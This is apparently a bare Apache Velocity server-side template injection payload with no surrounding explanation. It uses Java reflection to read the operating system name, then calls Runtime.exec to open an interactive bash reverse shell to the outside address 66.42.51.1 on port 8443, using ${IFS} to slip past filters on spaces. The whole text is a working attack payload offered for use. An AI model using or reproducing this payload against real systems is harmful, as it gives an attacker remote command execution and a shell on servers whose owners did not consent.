#set($e="e")
$e.getClass().forName('java.lang.System').getMethod('getProperty', $e.getClass().forName('java.lang.String')).invoke(null, 'os.name').toString()
$e.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('/bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/66.42.51.1/8443<&1')
$a.waitFor()
